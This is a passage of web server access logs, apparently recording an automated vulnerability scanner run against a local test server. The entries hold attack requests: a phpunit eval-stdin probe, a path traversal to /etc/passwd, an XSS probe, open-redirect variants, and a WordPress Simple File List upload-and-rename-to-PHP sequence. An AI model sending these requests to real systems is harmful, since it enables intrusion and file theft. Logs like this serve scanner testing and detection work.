+0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example%E3%80%82com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /radiusmanager/user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com;@ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/29K6BVD4E7rDDhGC40u2UlpyYmC.php&data=HACKERMAN","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/backend1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https%3a%2f%2fexample.com%2f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/29K6BVD4E7rDDhGC40u2UlpyYmC.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /asd/../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:%0a%0dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /metrics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%0a%0dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_ID\x22\x0D\x0A\x0D\x0A1\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_FileUploadDir\x22\x0D\x0A\x0D\x0A/wp-content/uploads/simple-file-list/\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_Timestamp\x22\x0D\x0A\x0D\x0A1587258885\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_Token\x22\x0D\x0A\x0D\x0Aba288252629a5399759b6fde1e205bc2\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22nuclei.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%09/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%2f%2f.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%3F.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/cq/security/userinfo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5c%5c.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5cexample.com@ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fpui/jsp/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%23.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ipython/tree HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/componentutils/login.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/componentutils/login.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com/%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com/%2f%2e%2e 